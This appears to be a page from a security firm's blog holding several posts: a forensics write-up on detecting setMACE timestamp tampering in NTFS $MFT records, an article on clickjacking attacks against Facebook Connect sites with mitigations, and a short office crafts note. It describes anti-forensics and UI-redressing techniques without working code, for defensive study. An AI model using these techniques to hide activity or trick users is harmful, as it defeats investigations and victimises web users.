37 FILE Seq: 1 Link: 0 0x38 0 Flags:
35 FILE Seq: 1 Link: 1 0x38 5 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Jan 1 00:00:00 1970 Z
A: Thu Jan 1 00:00:00 1970 Z
C: Thu Jan 1 00:00:00 1970 Z
B: Thu Jan 1 00:00:00 1970 Z
0x0030 112 0 0x0000 0x0000
FN: short.txt Parent Ref: 5 Parent Seq: 5
M: Thu Jan 1 00:00:00 1970 Z
A: Thu Jan 1 00:00:00 1970 Z
C: Thu Jan 1 00:00:00 1970 Z
B: Thu Jan 1 00:00:00 1970 Z
0x0080 40 0 0x0000 0x0018

36 FILE Seq: 1 Link: 2 0x38 8 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Sun Nov 25 02:24:00 2040 Z
A: Sun Nov 25 02:24:00 2040 Z
C: Sun Nov 25 02:24:00 2040 Z
B: Sun Nov 25 02:24:00 2040 Z
0x0030 120 0 0x0000 0x0000
FN: LONGFI~1.TXT Parent Ref: 5 Parent Seq: 5
M: Sun Nov 25 02:24:00 2040 Z
A: Sun Nov 25 02:24:00 2040 Z
C: Sun Nov 25 02:24:00 2040 Z
B: Sun Nov 25 02:24:00 2040 Z
0x0030 128 0 0x0000 0x0000
FN: longfilename.txt Parent Ref: 5 Parent Seq: 5
M: Sun Nov 25 02:24:00 2040 Z
A: Sun Nov 25 02:24:00 2040 Z
C: Sun Nov 25 02:24:00 2040 Z
B: Sun Nov 25 02:24:00 2040 Z
0x0080 40 0 0x0000 0x0018

37 FILE Seq: 3 Link: 1 0x38 3 Flags: 2
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:57:45 2011 Z
A: Thu Dec 29 22:57:45 2011 Z
C: Thu Dec 29 22:57:45 2011 Z
B: Thu Dec 29 22:57:45 2011 Z
0x0030 104 0 0x0000 0x0000
FN: 53142 Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:57:45 2011 Z
A: Thu Dec 29 22:57:45 2011 Z
C: Thu Dec 29 22:57:45 2011 Z
B: Thu Dec 29 22:57:45 2011 Z
0x0090 80 0 0x0004 0x0018

As you can see from the above snippet of both $MFT’s, the original $MFT entries (left) have their MACE timestamps for 12/29/11 while the tampered $MFT entries (right) have their MACE timestamps either historic or futuristic. Additionally to note is the $MFT entry #37 which in the tampered $MFT showed a folder named “53142”. This is the randomly generated folder setMACE created in order to carry out its move trick but it’s a good piece of forensic evidence since it wasn’t previously there and its timestamps are current.

Forensic Evidence

While it may make some in the dfir community a bit depressed to see a working POC that the $FN values can also be changed, it shouldn’t be the end of the world. It was bound to happen and now that there’s something known out there its characteristics and methods should be studied/observed. This type of thing is likely going to come up in your investigation at some point so instead of throwing in the towel why not show how good your forensics-foo is? There’re _plenty_ of artifacts that can help aid in the detection of timestamp manipulation:
  • How did it get to the system?
    • Web traffic (proxies), email, removable media
  • Do you have physical possession of the file you suspect performs the time stomping? If so, dynamic analysis will be the best resource.
  • Do you have a memory dump?
  • Was it executed on the system?
    • Prefetch, .lnk files, NTUSER.DAT’s Recent folder, A/V logs, MRU, ShellBags, {THINK!}
  • Are there any specific characteristics to the tool used?
    • Testing with setMACE showed possible indicators:
      • UAC dialog box for >= 6.0
      • Randomly named folder with digits created then deleted
        • $MFT record number of file(s) modified are close to that newly created folder
        • Time stamps of that folder created weren’t tampered with so good indication of when it occurred
  • What does the $I30 show?
  • What does the $INDX show?
  • Was the system clock altered?
  • Are both the $SI and $FN values modified? Does each of the $FN have their values changed?
  • Do the $FN values predate the $SI values? Should they?
  • What about the values in the $SI and $FN?
    • Do they seem impossible to exist? i.e. futuristic or too historic
    • Are the milli/nano seconds not set correctly? (Think granular, Timestomp & Magic Attribute usually set to the nearest second)
    • Are they blank?
    • Are they inconsistent when put into a timeline?

About the Author

Glenn P. Edwards Jr. is a Senior Consultant with Foundstone’s Incident Response practice where he specializes in Incident Response, Digital Forensics and Malware Analysis. Glenn holds a M.S degree in Digital Forensics from the University of Central Florida as well as a B.S. degree in Information Security and Privacy from High Point University.

Globalized Identity, Globalized Attacks

Considerations for the Social Web

By Amit Bagree.


“I really need to comment on this Vimeo video…”
“It’s time to look for a new job, let me get on Workstir…”
“Let me point out the irony in this CNN Money article…”
“Everyone is raving about Spotify, I need to check it out…”

This is a typical ‘Netizen’ maintaining tens of user accounts on the Internet and refilling the same information every time on account creation. Every new account creation is a task, and brings added responsibility of remembering another set of usernames and passwords. For the site itself, account creation is an impediment to gaining users, on top of the technical and security challenges of maintaining an authentication system and storing sensitive user data.

In past few years, there have been multiple efforts to solve this problem. There is a major shift occurring in the way users authenticate and interact with different properties on the Internet. The concept is straightforward – If a user has an account on another site which is willing to authenticate the user for me, why require him/her to create a new account on my l33tgadgets.com. In addition, if that site stores users’ contacts, likes, associations etc. I can request access to them to provide a more social experience.

The idea is akin to a Single sign-on (SSO) in some ways, which is very common within an Intranet environment. SSO is an access control technique in which multiple entities delegate their user authentication to an ‘Authentication Server’ thus enabling the users to keep a single identity referred as ‘Federated Identity’. On the Internet, various email and social media sites amongst others are offering to be ‘Authentication Providers’; Facebook, Twitter, Google and Yahoo being the most popular.

A key difference to note from the standard Intranet SSO concept is that ‘Authentication Providers’ for the Internet have to allow integration of entities that they have no control or oversight over, and no trust relationship with. In addition, the primary standards currently used by the Authentication Providers - OAuth , OpenID (likely to be updated to OpenID Connect), and ‘Facebook Connect’ , are in their evolution phase. These aspects bring unique security challenges which I’ll be discussing in a series of blog posts. Readers are encouraged to study the references for the three standards mentioned above.

UI Redressing – Write on my wall

UI Redressing, widely known as Clickjacking, is an instance of a ‘Confused Deputy’ vulnerability where the victim is tricked into performing sensitive actions (mouse clicks, keystrokes) on an authenticated site by hiding it behind another web page which is under attacker’s control – think ‘Click here to win an iPad’ overlaid on a ‘Delete account’ button.

UI Redressing shot into limelight with the Adobe Flash vulnerability which allowed tricking a user into enabling his webcam in the Flash plug-in settings. The exploit in Figure 1 although non-functional, helps envisioning the attack. Note the Flash player settings captured inside an IFRAME and a ‘Click’ button overlaid on top.

Any sensitive functionality on an application such as ‘delete all emails’, ‘mark photos public’, ‘add a friend’ is a good candidate for UI Redressing attack. Note that victim actions are not restricted to clicks alone, and as this blog post excellently describes, there are multiple other techniques such as dragging text into the victim application and capturing keystrokes via browser behavior or exploit. Clickjacking thus, is a misnomer, and ‘UI redressing’ attack is a more appropriate term.

UI Redressing has been around for a while and with Globalized Identities it gets more potent. Take for example Facebook Connect. Many popular sites around the web, now automatically connect your Facebook profile to their sites . This ‘Connect’ can take many forms ranging from simple ‘likes’ and ‘facepile’ of your friends (who like that site) to more interesting features such as sending messages and making comments.

In pre-Facebook Connect days if attackers needed to trick a user to perform a function on his/her Facebook page via UI Redressing it meant attacking Facebook directly. And to Facebook’s credit they implemented Anti-Clickjacking measures. However, now with the ubiquity of such Facebook Connect features on the web the attacker needs to capture just one of these sites to perform the attack. These sites are likely to have much weaker if any Clickjacking protection. As per a Stanford study, not a single top 500 website had adequate defense against Clickjacking. Considering the fact that there are over half a million Facebook users and social engineering attacks are fairly successful, it is easy to imagine a rise in UI Redressing attacks ranging from unintentional and potentially damaging comments to a viral video for profit. The attack leaves a lot of room for attacker’s creativity.

The na├»ve example below shows a news site with Facebook ‘Comment’ plug-in, captured in an IFRAME persuading a user to reveal sensitive information. The frame is kept partially opaque but an attacker would of course keep the opacity = 0. Also note that you can tag Facebook users using the ‘@’ symbol.


As a general principle of Information Security, a diversity of measures should be used for protection.

Application Developers

  • Sites implementing ‘Facebook Connect’ and other third-party authentication services with powerful functionality need to do more to protect their visitors. Mozilla Firefox has support for Content Security Policy (CSP) since version 3.7 and currently it is undergoing standardization at the W3C Web Application Security Working Group. The frame-ancestors directive in the policy can be used to define which sites are approved to frame your site. Microsoft came up with a dedicated header, ‘X-FRAME-OPTIONS’, to prevent UI Redressing, taking a similar approach to define sites which are allowed to frame your site (Note that CSP is more encompassing in its goal and implements features to mitigate other web application vulnerabilities such as Cross-site scripting). The X-FRAME-OPTIONS header is supported by current versions of all major browsers. In spite of availability of such simple countermeasures, the adoption of these headers is abysmal. It is time they are put to use.
  • Another mitigation technique against UI Redressing is using frame-busting code which was an initial make-shift countermeasure. Currently the best known frame busting code can be used to protect users of older browsers. Keep in mind that numerous older frame-busting solutions can be bypassed in numerous ways.

Authentication Providers

  • Authentication providers such as Facebook ought to provide an opt-in choice to their users. This would require architectural change in the Facebook Connect implementation but to acknowledge the risk and provide a choice to the user would go a long way in keeping them happy. Currently there is no way for a user to avoid authenticating to these sites with their Facebook identity by default when they are logged in to Facebook. The integration of Facebook identity to sites around the web without any user interaction exposes sensitive functionalities such as messaging and commenting to attacks.

End Users

  • Unfortunately the users at present are largely at the mercy of the application developers and Facebook. As a workaround ad blocking utilities on Firefox and Chrome such as AdBlock Plus can be used to block requests to Facebook domains from third-party application.
  • Firefox plug-in NO-SCRIPT provides UI Redressing protection via its ‘ClearClick’ module. It performs a clever check of comparing screenshots of the actual object the user intends to click and of the page the user sees. A difference in image raises a UI Redressing alert. The module provides protection even if the user chooses ‘Allow scripts globally’.
  • It’s a good practice to logout from Facebook after you are done but it’s a cumbersome solution for many and doesn’t prevent the attack while they are logged in.
  • End Users need to develop healthy skepticism. Do not enter any sensitive data and/or click on unknown or suspicious sites no matter how enticing that game might be.

Big thanks to Patrick Bogen for the technical review!

Monday, January 2, 2012

Tiny Car Super Ramp!

One of the assistants here just so happened to have a little red McAfee branded Volkswagen beetle.. so this ArtsNCrafts session is about building a super ramp for it made out of FedEx boxes!